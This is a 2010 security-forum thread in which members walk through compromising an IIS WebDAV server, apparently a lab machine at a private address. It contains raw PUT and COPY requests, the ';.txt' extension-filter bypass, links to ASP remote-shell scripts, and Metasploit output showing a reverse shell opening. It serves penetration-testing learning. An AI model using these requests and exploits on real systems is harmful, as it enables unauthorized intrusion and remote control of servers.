The Ethical Hacker Network - HTTP header: PUT, DELETE, etc

H1t M0nk3y

Hero Member

Online

Posts: 865

HTTP header: PUT, DELETE, etc

« on: August 19, 2010, 07:37:02 AM »

Hi,

When I use Nikto or Nessus to scan a web server, I often get messages like this:

Code:

+ OSVDB-0: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OSVDB-0: HTTP method ('Allow' Header): 'PROPFIND' may indicate DAV/WebDAV is installed. This may be used to get directory listings if indexing is allow but a default page exists.
+ OSVDB-0: HTTP method ('Allow' Header): 'PROPPATCH' indicates WebDAV is installed.
+ OSVDB-425: HTTP method ('Allow' Header): 'SEARCH' indicates DAV/WebDAV is installed, and may be used to get directory listings if Index Server is running.
+ OSVDB-0: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OSVDB-0: HTTP method ('Public' Header): 'PROPFIND' may indicate DAV/WebDAV is installed. This may be used to get directory listings if indexing is allow but a default page exists.
+ OSVDB-0: HTTP method ('Public' Header): 'PROPPATCH' indicates WebDAV is installed.
+ OSVDB-425: HTTP method ('Public' Header): 'SEARCH' indicates DAV/WebDAV is installed, and may be used to get directory listings if Index Server is running.

How can I compromise a server using one of these headers? Can I use the PUT header method to upload a file on the server?

Couldn't find anything interesting on Google...


	Logged

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP

ajohnson

Recruiters
Hero Member

Offline

Posts: 1060

aka dynamik

Re: HTTP header: PUT, DELETE, etc

« Reply #1 on: August 19, 2010, 08:24:50 AM »

Those are usually indicative of WebDAV, so you could try a WebDAV client. You'll sometimes find that a OPTIONS / HTTP/1.0 will show a lot of methods like that, but you'll get a 501 Not Implemented when you try to use them. WebDAV may also require authentication. Just google HTTP <method> to see the syntax for using them manually through netcat or something.


	Logged

WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.

Equix3n-

Sr. Member

Offline

Posts: 386

Re: HTTP header: PUT, DELETE, etc

« Reply #2 on: August 19, 2010, 08:48:48 AM »

PUT method can be used to upload a file to the server only if the directory is writable. If the user, with which the website is run, doesn't have write privileges on a directory, you won't be able to upload to that directory., even if PUT verb is allowed.

How do you find if a website allows PUT verb?
nc -v <domain or I.P> <webserver port>
OPTIONS / HTTP/1.0

How do you know if a directory is writable?
You can follow a brute-force approach and try every directory.
You can enumerate the directories used to store user ulploads like images, attachments etc and then try PUT method on each one of these.

http://upload.thinfile.com/docs/put.php


	Logged

H1t M0nk3y

Hero Member

Online

Posts: 865

Re: HTTP header: PUT, DELETE, etc

« Reply #3 on: August 19, 2010, 09:32:04 AM »

Thanks guys

I was successful sending this (using the Burp Suite):

Code:

PUT /test.txt HTTP/1.1
Host: 192.168.1.199
Content-Length: 6

Yesss!

Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google...


	Logged

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP

H1t M0nk3y

Hero Member

Online

Posts: 865

Re: HTTP header: PUT, DELETE, etc

« Reply #4 on: August 19, 2010, 09:43:19 AM »

Got some nice ASP code here:
http://classicasp.aspfaq.com/general/how-do-i-execute-a-ping-command-from-asp-and-retrieve-the-results.html

But I can't create .asp files. Only .txt...

Nothing is easy! Undecided


	Logged

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP

Equix3n-

Sr. Member

Offline

Posts: 386

Re: HTTP header: PUT, DELETE, etc

« Reply #5 on: August 19, 2010, 09:49:49 AM »

I guess you should now be able to upload an asp script which provides a remote shell.

http://skypher.com/index.php/2010/03/04/aspsh-a-remote-shell-written-in-asp/
Note: I've never used the above script.

Edit: I was a few seconds late.
You should be able to create to more than just .txt files. Can you please try again?


« Last Edit: August 19, 2010, 09:53:40 AM by Equix3n- »	Logged

H1t M0nk3y

Hero Member

Online

Posts: 865

Re: HTTP header: PUT, DELETE, etc

« Reply #6 on: August 19, 2010, 10:02:38 AM »

I tried again and this code doesn't work:

Code:

PUT /test.asp HTTP/1.1
Host: 192.168.1.199
Content-Length: 6

Yesss!

These file types work:

.txt
.html
.htm
.js
.vbs

Maybe I am missing something in the HTTP header...


	Logged

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP

Equix3n-

Sr. Member

Offline

Posts: 386

Re: HTTP header: PUT, DELETE, etc

« Reply #7 on: August 19, 2010, 10:10:23 AM »

Are you getting any specific error message or just the code isn't working?


	Logged

H1t M0nk3y

Hero Member

Online

Posts: 865

Re: HTTP header: PUT, DELETE, etc

« Reply #8 on: August 19, 2010, 10:21:17 AM »

I get a 404 Object Not Found when I try to access it.

All the other ones are there. Could it be that, by default, IIS prevent us from creating .asp files remotely?


	Logged

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP

ajohnson

Recruiters
Hero Member

Offline

Posts: 1060

aka dynamik

Re: HTTP header: PUT, DELETE, etc

« Reply #9 on: August 19, 2010, 10:23:10 AM »

Can you use MOVE to rename it from a txt to an asp? I'm not that familiar with this stuff, but it might be worth a try.


	Logged

WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.

Equix3n-

Sr. Member

Offline

Posts: 386

Re: HTTP header: PUT, DELETE, etc

« Reply #10 on: August 19, 2010, 10:32:29 AM »

I just read an article which might solve your problem. I didn't understand how to take elements from this article and word it exactly for your problem, so I'm just linking it here (Being just a college student, I've my limitations Wink

). http://blogs.msdn.com/b/david.wang/archive/2005/08/20/why-can-i-upload-a-file-without-iis-write-permission.aspx


« Last Edit: August 19, 2010, 10:34:01 AM by Equix3n- »	Logged

H1t M0nk3y

Hero Member

Online

Posts: 865

Re: HTTP header: PUT, DELETE, etc

« Reply #11 on: August 19, 2010, 10:45:05 AM »

Thanks for the article, but it doesn't solve my problem... Sad

I am working on COPY and MOVE right now...


	Logged

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP

xXxKrisxXx

Hero Member

Offline

Posts: 512

Re: HTTP header: PUT, DELETE, etc

« Reply #12 on: August 19, 2010, 11:58:38 AM »

Quote

Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google...

Maybe this may help?
http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html


	Logged

eCPPT, GCIH, OSCP, OSWP

H1t M0nk3y

Hero Member

Online

Posts: 865

Re: HTTP header: PUT, DELETE, etc

« Reply #13 on: August 19, 2010, 01:02:56 PM »

Great reading!

Quote

If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(

This is exactly my problem. But:

Quote

Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.

I was all excited, but the server doesn't seem to be running this version of Windows (nmap -O couldn't pin point the OS...)

I tried:

Code:

COPY /test.txt HTTP/1.1

Host: 192.168.1.199

Destination: http://192.168.1.199/test.asp;.txt

I found other things on the server, so I will poke at them for a while.

Thanks guys


	Logged

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP

H1t M0nk3y

Hero Member

Online

Posts: 865

Re: HTTP header: PUT, DELETE, etc

« Reply #14 on: August 19, 2010, 01:13:25 PM »

It worked!!!

The Metasploit exploit iis_webdav_upload_asp did the trick:

Code:

msf exploit(iis_webdav_upload_asp) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Uploading 612333 bytes to /metasploit161123510.txt...
[*] Got a 100 response, trying to read again
[*] Moving /metasploit161123510.txt to /metasploit161123510.asp...
[*] Executing /metasploit161123510.asp...
[*] Deleting /metasploit161123510.asp, this doesn't always work...
[*] Sending stage (240 bytes) to 192.168.1.199
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.199:3409) at Thu Aug 19 14:11:43 -0400 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


	Logged

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP

Pages: [1] 2 Go Up

« previous next »